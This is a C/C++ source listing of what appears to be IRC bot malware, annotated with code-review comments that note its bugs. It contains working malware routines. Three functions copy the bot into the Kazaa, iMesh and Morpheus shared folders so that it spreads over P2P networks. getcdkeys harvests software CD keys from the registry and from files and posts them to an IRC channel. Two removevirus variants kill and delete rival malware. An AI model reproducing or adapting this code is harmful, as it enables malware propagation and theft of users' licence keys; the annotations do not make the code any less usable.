/*
 * Read a string-typed registry value into a file-static buffer.
 *
 * root/subkey/name identify the value. `type` is only consulted when it is
 * REG_MULTI_SZ; in that case the NUL separators inside the value are
 * rewritten as '\n' so the list comes back as one newline-separated string.
 *
 * Returns a pointer to szRegBuffer, which is zeroed and overwritten on every
 * call (the result is only valid until the next call), or a null pointer when
 * the key cannot be opened or the value cannot be read. The '\0' in the
 * failure return is a character literal acting as the null pointer constant.
 *
 * fRegOpenKeyEx / fRegQueryValueEx / fRegCloseKey are not defined in this
 * listing; presumably wrappers around the advapi32 registry API resolved
 * elsewhere in the file -- confirm against the rest of the source.
 */
char *RegQuery(HKEY root,LPCTSTR subkey,LPCTSTR name,DWORD type/*=REG_SZ*/)
{
    HKEY key=NULL;
    // In/out size: on entry the buffer capacity, on return the bytes stored.
    DWORD dwRes=65535;
    // Two spare bytes beyond the 65535 requested so the terminator written
    // below at index dwRes stays inside the array.
    static char szRegBuffer[65535+2];
    // Only the first 65535 bytes are cleared; the remaining two keep their
    // previous contents (zero from static initialisation until written).
    ZeroMemory(szRegBuffer,65535);
    // Opened with KEY_ALL_ACCESS although only a read is performed; this asks
    // for more rights than a query needs and will fail where write access to
    // the key is denied.
    if(fRegOpenKeyEx(root,subkey,0,KEY_ALL_ACCESS,&key) == ERROR_SUCCESS) {
        // Type of the stored value is not requested (4th arg NULL) and so is
        // never checked against `type`; the caller's `type` is trusted.
        if(fRegQueryValueEx(key,name,NULL,NULL,(unsigned char *)szRegBuffer,&dwRes) == ERROR_SUCCESS) {
            if (type==REG_MULTI_SZ) {
                szRegBuffer[dwRes] = '\0'; // Ensure termination
                // Skip back through ALL the null chars first (the list's
                // double-NUL terminator) so they are not turned into '\n'.
                while (szRegBuffer[dwRes]=='\0' && dwRes != 0) --dwRes;
                for (unsigned int i=0; i<dwRes; ++i) {
                    if (szRegBuffer[i]=='\0') szRegBuffer[i]='\n'; // Convert to \n
                }
            }
            // For every other type the buffer relies on the ZeroMemory above
            // for its terminator.
            fRegCloseKey(key);
            return szRegBuffer;
        }
        fRegCloseKey(key);
    }
    // Null pointer on any failure (char literal '\0' converts to NULL).
    return '\0';
}
/*
 * Walk the file-level `viruses[]` table and, for every entry whose registry
 * value exists, delete that value and the same-named executable in the
 * system directory. The table's layout (hkey, subkey, value, file) is
 * inferred from the member accesses below; its definition is not in view.
 *
 * Observations useful when reading this routine:
 *  - `lRet` receives the open result but is never checked, so `hkey` is used
 *    (and later closed) even when the open failed; `hkey` is uninitialised
 *    in that case.
 *  - `dwSize` is an in/out parameter of RegQueryValueEx and is never reset
 *    to 128 between iterations, so each query is limited by the size the
 *    previous successful query returned.
 *  - The value read into `szDataBuf` is never used; the query only serves
 *    as an existence check.
 */
void removevirus()
{
    char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
    unsigned char szDataBuf[128];
    HKEY hkey;
    LONG lRet;
    DWORD dwSize = 128;
    // A NULL subkey marks the end of the table.
    for (unsigned int i=0; viruses[i].subkey; i++) {
        lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey);
        if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
            // Remove the registry value (the key was opened KEY_READ only,
            // so whether the delete succeeds depends on the handle's rights).
            fRegDeleteValue(hkey, viruses[i].value);
            //FIXME: Replace the afw kill utils. we dont need to let that loop,
            // when we removed the .exe and the reg key. mayb a static call
            // to KillProcess(); can be inserted here. Something like:
            // KillProcess(viruses[i].file);
            // Build "<system dir>\<file>" and delete it; sprintf is unbounded,
            // so this depends on the table's file names staying short.
            GetSystemDirectory(sysdir, sizeof(sysdir));
            sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
            DeleteFile(virusexecuteble);
        }
        fRegCloseKey(hkey);
    }
    return;
}
/*
 * Copy `botfile` into the directory named by the iMesh client's
 * "DownloadsLocation" registry value (HKLM\SOFTWARE\iMesh\Client).
 *
 * Notes:
 *  - The open result is ignored; `hkey` starts as NULL and the query is
 *    attempted regardless of whether the key exists.
 *  - `dwSize` is 128 although `buffer` holds MAX_PATH bytes, so values
 *    longer than 128 bytes are not read and the copy is skipped.
 *  - `buffer` is used as a path without checking that the value was
 *    NUL-terminated or is a directory; CopyFile with FALSE overwrites an
 *    existing destination.
 */
void iMeshInit(char *botfile)
{
    char buffer[MAX_PATH];
    HKEY hkey = NULL;
    DWORD dwSize = 128;
    fRegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\iMesh\\Client", 0, KEY_READ, &hkey);
    if(fRegQueryValueEx(hkey, "DownloadsLocation", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
        CopyFile(botfile, buffer, FALSE);
    }
    fRegCloseKey(hkey);
    return;
}
/*
 * Copy `botfile` into the Kazaa shared directory read from the "Dir0" value
 * under HKCU\SOFTWARE\KAZAA\LocalContent.
 *
 * The literal prefix "012345:" is stripped from the value before it is used
 * as a path (replacestr is defined elsewhere; the exact format of the Dir0
 * value is not visible here -- presumably "<flags>:<path>").
 *
 * Notes:
 *  - `hkey` is uninitialised and the open result is ignored, so a failed
 *    open leaves the query and the close operating on garbage.
 *  - `dwSize` is 128 while `buffer` is MAX_PATH bytes; longer values are
 *    not read.
 */
void KazaaInit(char *botfile)
{
    char buffer[MAX_PATH];
    HKEY hkey;
    DWORD dwSize = 128;
    fRegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\KAZAA\\LocalContent", 0, KEY_READ, &hkey);
    if(fRegQueryValueEx(hkey, "Dir0", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
        replacestr(buffer, "012345:", "");
        CopyFile(botfile, buffer, FALSE);
    }
    fRegCloseKey(hkey);
    return;
}
/*
 * Copy `botfile` into "<Install_Dir>\My Shared Folder", where Install_Dir is
 * read from HKLM\SOFTWARE\Morpheus.
 *
 * Notes:
 *  - `hkey` is uninitialised and the open result is ignored (same pattern as
 *    iMeshInit/KazaaInit).
 *  - `_snprintf` is given `buffer` as both destination and the %s argument;
 *    the two regions overlap, which the C standard does not guarantee, and
 *    `_snprintf` does not NUL-terminate on truncation.
 *  - The directory path itself is passed to CopyFile as the destination
 *    name, not a file inside it.
 *  - `dwSize` is 128 while `buffer` is MAX_PATH bytes; longer values are
 *    not read.
 */
void MorpheusInit(char *botfile)
{
    char buffer[MAX_PATH];
    HKEY hkey;
    DWORD dwSize = 128;
    fRegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Morpheus", 0, KEY_READ, &hkey);
    if(fRegQueryValueEx(hkey, "Install_Dir", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
        _snprintf(buffer, sizeof(buffer), "%s\\My Shared Folder", buffer);
        CreateDirectory(buffer, 0);
        CopyFile(botfile, buffer, FALSE);
    }
    fRegCloseKey(hkey);
    return;
}
/*
 * Overload of RegQuery for DWORD values (the reference parameter makes this
 * C++). Reads `name` under root\subkey into a DWORD.
 *
 * `success` is set to TRUE and the value returned when both the open and the
 * query succeed; otherwise `success` is FALSE and 0 is returned, so a stored
 * value of 0 is only distinguishable from failure through `success`.
 *
 * Notes:
 *  - `dwType` is passed to the query and receives the stored type, but it is
 *    never compared with REG_DWORD afterwards; a non-DWORD value of up to
 *    sizeof(DWORD) bytes would be returned as if it were one.
 *  - Opened with KEY_ALL_ACCESS although only a read is performed.
 */
DWORD RegQuery(HKEY root,LPCTSTR subkey,LPCTSTR name,BOOL &success)
{
    HKEY key=NULL;
    DWORD dwType=REG_DWORD,dwSize=sizeof(DWORD),dwRead=0;
    if(fRegOpenKeyEx(root,subkey,0,KEY_ALL_ACCESS,&key)==ERROR_SUCCESS) {
        if(fRegQueryValueEx(key,name,NULL,&dwType,(LPBYTE)&dwRead,&dwSize)==ERROR_SUCCESS) {
            fRegCloseKey(key);
            success=TRUE;
            return dwRead;
        }
        fRegCloseKey(key);
    }
    success=FALSE;
    return 0;
}
/*
 * Walk the file-level `regkeys[]` table, read each entry's registry value,
 * and report it (or a line from a file under it) to the IRC channel `chan`
 * through irc_privmsg, also writing the same text to the log via addlog.
 *
 * Table layout inferred from the member accesses: hkey, subkey, value,
 * file (optional), tag, name. Two shapes of entry are handled:
 *  - file == NULL: the registry value itself is reported.
 *  - file != NULL: the registry value is treated as a directory, the file
 *    "<value>\<file>" is opened and scanned line by line; the first line
 *    that does NOT contain `tag` (note the `!strstr`) is reported. When
 *    `tag` contains '=', only the text after the first '=' on that line
 *    is reported.
 *
 * Observations:
 *  - `lRet` is never checked, so `hkey` is used uninitialised after a failed
 *    open.
 *  - `dwSize` is not reset between iterations (RegQueryValueEx updates it
 *    in place), so later queries are bounded by earlier results.
 *  - `szDataBuf` (128 bytes) is not guaranteed NUL-terminated before being
 *    used with %s; the sprintf calls into `sendbuf`/`szPath` are unbounded.
 *  - `line` is 100 bytes, so a longer file line is reported in pieces.
 *  - The "4<<12" / "4>>" fragments in the format strings are IRC
 *    colour-code markup as preserved in this listing.
 * irc_privmsg, addlog and the f-prefixed registry wrappers are defined
 * elsewhere in the file.
 */
void getcdkeys(SOCKET sock, char *chan, BOOL notice)
{
    char sendbuf[IRCLINE], line[100], szPath[MAX_PATH];
    unsigned char szDataBuf[128];
    FILE *fp;
    HKEY hkey;
    LONG lRet;
    DWORD dwSize = 128;
    // A NULL subkey terminates the table.
    for (unsigned int i=0; regkeys[i].subkey; i++) {
        lRet = fRegOpenKeyEx(regkeys[i].hkey, regkeys[i].subkey, 0, KEY_READ, &hkey);
        if(fRegQueryValueEx(hkey, regkeys[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
            if (regkeys[i].file) {
                // Registry value is a directory; look inside the named file.
                sprintf(szPath, "%s\\%s", szDataBuf, regkeys[i].file);
                if((fp=fopen(szPath,"r"))!=NULL) {
                    while(fgets(line,sizeof(line),fp)) {
                        // Report the first line that does not contain the tag.
                        if(!strstr(line, regkeys[i].tag)) {
                            if (strchr(regkeys[i].tag,'=')) {
                                // "key=value" style line: keep the part after '='.
                                strtok(line,"=");
                                sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,strtok(NULL, "="));
                            }
                            else
                                sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,line);
                            irc_privmsg(sock,chan,sendbuf,notice);
                            addlog(sendbuf);
                            break;
                        }
                    }
                    fclose(fp);
                }
            }
            else {
                // No file: the registry value is the item of interest.
                sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,szDataBuf);
                irc_privmsg(sock,chan,sendbuf,notice);
                addlog(sendbuf);
            }
        }
        fRegCloseKey(hkey);
    }
    return;
}
/*
 * Second variant of removevirus (this listing contains two definitions of
 * the same name). Same table walk as the first: for each `viruses[]` entry
 * whose registry value exists, delete the value, attempt to terminate the
 * matching process via listProcesses, then delete the executable from the
 * system directory.
 *
 * Differences from the first variant:
 *  - A TCP socket is created with fsocket and handed to listProcesses; it is
 *    never closed in this function.
 *  - The entry's file name is copied into the 20-byte `current` with an
 *    unbounded strcpy.
 *  - `sendbuf` is formatted after each kill attempt and again at the end
 *    ("[AV]: Antivirus search complete! ") but is never sent or logged from
 *    here; the text is discarded.
 *
 * The unchecked `lRet`/uninitialised `hkey`, the `dwSize` that is never reset
 * between iterations, and the unbounded sprintf into `virusexecuteble` are
 * the same as in the first variant. listProcesses and fsocket are defined
 * elsewhere; their contracts are not visible here.
 */
void removevirus()
{
    char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
    unsigned char szDataBuf[128];
    SOCKET sock;
    HKEY hkey;
    char sendbuf[IRCLINE];
    char current[20];
    LONG lRet;
    // Socket is only used as an argument to listProcesses below.
    sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    DWORD dwSize = 128;
    for (unsigned int i=0; viruses[i].subkey; i++) {
        lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey);
        if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
            fRegDeleteValue(hkey, viruses[i].value);
            // No length check against sizeof(current).
            strcpy(current,viruses[i].file);
            //FIXME: Replace the afw kill utils. we dont need to let that loop,
            // when we removed the .exe and the reg key. mayb a static call
            // to KillProcess(); can be inserted here. Something like:
            // listProcesses returning 1 is treated as "process killed".
            if(listProcesses(sock,NULL,FALSE,current) == 1)
                sprintf(sendbuf,"[PROC]: Process killed: %s",viruses[i].file);
            else
                sprintf(sendbuf,"[PROC]: Failed to terminate process: %s", viruses[i].file);
            //KillProcess(viruses[i].file);
            GetSystemDirectory(sysdir, sizeof(sysdir));
            sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
            DeleteFile(virusexecuteble);
        }
        fRegCloseKey(hkey);
    }
    // Formatted but not emitted anywhere in this function.
    sprintf(sendbuf,"[AV]: Antivirus search complete! ");
    return;
}
/*
 * Return the directory containing the registered Firefox executable.
 *
 * Reads the default value of
 * HKLM\SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command,
 * drops a leading double quote if present, and truncates at the last
 * backslash so only the directory part remains.
 *
 * Returns a malloc'd copy the caller must free, or NULL when the key cannot
 * be opened, the value cannot be read, the value is empty, or malloc fails.
 *
 * Notes:
 *  - The quote-stripping loop shifts every character left by one but leaves
 *    the last character in place (it is duplicated, not removed); the
 *    trailing quote is normally cut off by the backslash truncation anyway.
 *  - `pathSize <= 0` reduces to `pathSize == 0` since DWORD is unsigned.
 *  - The value is used as a C string without checking that the registry
 *    data was NUL-terminated within `path`.
 *  - The commented-out DisplayMesg calls are left as found.
 */
char *GetFirefoxLibPath()
{
    char regSubKey[] = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command";
    char path[_MAX_PATH] ="";
    char *firefoxPath = NULL;
    DWORD pathSize = _MAX_PATH;
    DWORD valueType;
    HKEY rkey;

    // Open firefox registry key
    if( fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS ) {
        //DisplayMesg(TYPE_DEBUG, "\n Failed to open the firefox registry key : HKCU\\%s", regSubKey );
        return NULL;
    }

    // Read the firefox path value (the key's default value: name == NULL).
    // valueType is filled in but never checked against REG_SZ.
    if( fRegQueryValueEx(rkey, NULL, 0, &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS ) {
        //DisplayMesg(TYPE_DEBUG, "\n Failed to read the firefox path value from registry ");
        fRegCloseKey(rkey);
        return NULL;
    }

    if( pathSize <= 0 || path[0] == 0) {
        //DisplayMesg(TYPE_DEBUG, "\n Path value read from the registry is empty");
        fRegCloseKey(rkey);
        return NULL;
    }
    fRegCloseKey(rkey);

    // This path may contain extra double quote.... Shift left by one to
    // drop the opening quote (the final character is left in place).
    if( path[0] == '\"' ) {
        for(unsigned int i=0; i< strlen(path)-1 ; i++)
            path[i] = path[i+1];
    }
    //DisplayMesg(TYPE_DEBUG, "\n Path value read from registry is %s", path);

    // Terminate the string at last "\\" so only the directory remains.
    for(int j=strlen(path)-1; j>0; j--) {
        if( path[j] == '\\' ) {
            path[j]=0;
            break;
        }
    }

    // Ownership of the returned buffer passes to the caller.
    firefoxPath = (char*) malloc( strlen(path) + 1);
    if( firefoxPath )
        strcpy(firefoxPath, path);
    //DisplayMesg(TYPE_DEBUG, "\n Firefox path = [%s] ", firefoxPath);
    return firefoxPath;
}